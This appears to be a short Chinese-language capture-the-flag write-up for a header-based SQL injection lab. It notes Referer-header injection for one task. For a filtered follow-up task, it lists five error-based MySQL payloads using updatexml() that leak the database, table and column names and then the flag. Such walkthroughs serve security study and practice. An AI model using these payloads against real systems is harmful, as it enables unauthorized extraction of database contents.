第二题就是在referer添加SQL语句进行注入和上一题步骤一样
第三题
再用上面那个方法就行不通了,多加了一层过滤
1'and updatexml(1,"1",1),'1') -- 1
1'and updatexml(1,concat("1",(select database())),1),'1') -- 1
1'and updatexml(1,concat("1",(select table_name from information_schema.tables where table_schema='head_error' limit 0,1)),1),'1') -- 1
1'and updatexml(1,concat("1",(select column_name from information_schema.columns where table_schema='head_error' and table_name='flag_head' limit 0,1)),1),'1') -- 1
1'and updatexml(1,concat("1",(select flag_h1 from flag_head limit 0,1)),1),'1') -- 1
